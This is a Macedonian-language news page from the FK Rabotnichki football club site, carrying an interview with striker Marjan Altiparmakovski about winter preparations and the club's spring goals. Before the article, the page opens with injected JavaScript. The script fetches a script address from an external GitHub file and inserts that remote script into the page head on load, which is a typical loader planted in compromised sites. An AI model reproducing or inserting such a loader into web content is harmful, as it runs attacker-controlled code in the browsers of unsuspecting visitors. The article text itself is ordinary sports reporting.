;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ФК Работнички » Алтипармаковски: Очекувам поубава пролет, и за мене, и за Работнички
shopping-bag 0
Items : 0
Subtotal : 0 MKD
View Cart Check Out

Алтипармаковски: Очекувам поубава пролет, и за мене, и за Работнички

Зимски подготовки, напорни тренинзи со една цел – тимот да се подготовки максимално за пролетните искушенија. Работнички под водство на тренерот Томислав Франц влезе во втората седмица од планираната програма, а во нотесот останува запишано, од 22.јануари (петок) експедицијата заминува во турската база Анталија. Дотогаш, ќе се работи во клупскиот комплекс, на подобрување на физичката подготовка, двапати дневно.

Еден од оние кои се надеваат на многу поубава и поуспешна пролет е напаѓачот Марјан Алтипармаковски. Популарниот Маца, имаше проблеми со реализацијата во есенскиот дел од шампионатот, па се надева дека ќе се подобри максимално за вториот дел од сезоната.

„Работиме напорно под ’команда’ на новиот шеф на стручниот штаб Томислав Франц. Атмосферата е одлична, а акцентот е ставен на подобрување на физичката кондиција. Така е секогаш, во овие први денови од зимските подготовки. Но, тоа е и најважно, да создадеме база која ќе не држи цела пролет. Искрено, се надевам дека за мене, а и за Работнички, пролетта ќе биде многу поубава отколку есента“, вели Алтипармаковски.

Напаѓачите се најсреќни кога постигнуваат голови, но Алтипармаковски е тимски играч, тој секогаш колективот го става пред поединецот.

„Најважно е Работнички да победува. Есента испуштивме многу бодови, имавме проблеми со повредите, а мислам дека и среќата на одредени мечеви не беше со нас. Но, тоа е зад нас, сега ни останува напорно да работиме и да се подготвиме за следните искушенија. Целта е јасна, и апсолутно ќе се трудиме да ја оствариме, повторен излез на европската сцена. Вардар и Шкендија побегнаа многу бодовно во првенството, но нашата цел да го освоиме тоа трето место, кое носи излез во Европа. Исто така, еден од приоритетите е и Купот на Македонија. Полуфиналисти сме, сакаме повторно да бидеме дел од големото финале, но и да го одбраниме трофејот“, порачува Марјан Атипармаковски.

Leave a Reply